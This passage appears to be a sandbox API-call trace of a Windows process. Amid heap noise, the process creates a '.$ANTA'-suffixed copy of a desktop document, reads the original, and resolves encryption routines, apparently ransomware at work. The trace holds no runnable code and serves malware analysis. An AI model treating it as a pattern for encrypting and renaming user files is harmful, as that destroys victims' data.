0x43e2800 [0131.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0131.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27e0 [0131.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0131.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2810 [0131.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0131.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0131.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0131.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0131.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0131.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a4480 [0131.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0131.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x4369d70 [0131.838] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0131.838] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a2f0 [0131.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41a4480 | out: hHeap=0x1780000) returned 1 [0131.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0131.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0131.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0131.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0131.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0131.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4369d70 | out: hHeap=0x1780000) returned 1 [0131.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0131.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0131.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0131.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0131.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a450 [0131.839] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9")) returned 0x10 [0131.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a450 | out: hHeap=0x1780000) returned 1 [0131.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0131.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a2f0 | out: hHeap=0x1780000) returned 1 [0131.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0131.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0131.839] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0131.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0131.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0131.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0131.839] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2800 [0131.839] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\dcplTjPjl4z2QV.odp.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\ui6djwkjdmy9\\dcpltjpjl4z2qv.odp.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0131.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf888 [0131.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0131.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0131.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0131.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0131.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0131.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0131.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0131.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0131.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2900 [0131.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0131.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fe8 [0131.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0131.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0131.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0131.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0131.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac180 [0131.840] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac180 | out: hHeap=0x1780000) returned 1 [0131.840] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac140 [0131.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0131.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0131.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0131.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0131.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0131.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0131.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0131.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0131.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0131.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0131.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0131.841] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0131.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0131.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0131.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0131.841] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x1b8a020 [0131.844] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eca8 | out: lpNewFilePointer=0x0) returned 1 [0131.844] ReadFile (in: hFile=0x258, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x941f, lpOverlapped=0x0) returned 1 [0131.846] ReadFile (in: hFile=0x258, lpBuffer=0x43eba98, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ecd0, lpOverlapped=0x0 | out: lpBuffer=0x43eba98*, lpNumberOfBytesRead=0x144ecd0*=0x0, lpOverlapped=0x0) returned 1 [0131.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0131.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0131.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0131.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0131.846] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x941f) returned 0x49aa010 [0131.846] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1b8a020 | out: hHeap=0x1780000) returned 1 [0131.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0131.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0131.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0131.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0131.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0131.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x941f) returned 0x49b3438 [0131.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0131.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0131.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2860 [0131.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0131.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0131.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28d0 [0131.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0131.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x941f) returned 0x49aa010 [0131.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28d0 | out: hHeap=0x1780000) returned 1 [0131.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x49aa010 | out: hHeap=0x1780000) returned 1 [0131.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0131.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0131.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0131.849] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2860 | out: hHeap=0x1780000) returned 1 [0131.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0131.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0131.849] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e88 [0131.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e88 | out: hHeap=0x1780000) returned 1 [0131.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0131.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27a0 | out: hHeap=0x1780000) returned 1 [0131.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac440 [0131.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0131.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0131.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0131.850] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0131.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0131.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0131.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0131.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27b0 [0131.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8b0 [0131.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0131.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2830 [0131.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0131.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x941f) returned 0x49aa010 [0131.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0131.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e28b0 [0131.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0131.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0131.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27e0 | out: hHeap=0x1780000) returned 1 [0131.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e27e0 [0131.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0131.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0131.850] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0131.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2760 [0131.850] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0131.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabf8 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2830 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2840 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x941f) returned 0x49bc860 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0131.851] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28d0 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffb8 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2920 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0131.851] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0131.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0131.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28f0 [0131.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28f0 | out: hHeap=0x1780000) returned 1 [0131.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0131.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0131.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0131.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28f0 [0131.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0131.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0131.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0131.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0131.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27a0 [0131.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0131.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2900 [0131.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90b0 [0131.852] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0131.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a90b0 | out: hHeap=0x1780000) returned 1 [0131.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2900 | out: hHeap=0x1780000) returned 1 [0131.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfea0 [0131.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2900 [0131.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdd8 [0131.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0131.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0131.852] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0131.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cad48 [0131.852] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2750 [0131.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8d08 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00a8 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a40 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0131.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafe8 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadf0 [0131.853] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2990 | out: hHeap=0x1780000) returned 1 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796d68 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad90 [0131.853] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2b48 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cae08 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b10 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0131.853] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0131.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0131.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a50 [0131.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb000 [0131.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0131.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb000 | out: hHeap=0x1780000) returned 1 [0131.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0131.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf88 | out: hHeap=0x1780000) returned 1 [0131.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0131.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf70 | out: hHeap=0x1780000) returned 1 [0131.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a10 | out: hHeap=0x1780000) returned 1 [0131.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0131.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0131.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad90 | out: hHeap=0x1780000) returned 1 [0131.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b00 | out: hHeap=0x1780000) returned 1 [0131.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cadf0 | out: hHeap=0x1780000) returned 1 [0131.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0131.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00f8 | out: hHeap=0x1780000) returned 1 [0131.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a70 | out: hHeap=0x1780000) returned 1 [0131.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00f8 [0131.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0131.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ac0 [0131.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf40 [0131.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb078 [0131.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29d0 [0131.854] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb078 | out: hHeap=0x1780000) returned 1 [0131.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0131.854] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0131.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a50 [0131.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0131.855] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392420 [0131.855] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0131.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392420 | out: hHeap=0x1780000) returned 1 [0131.855] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 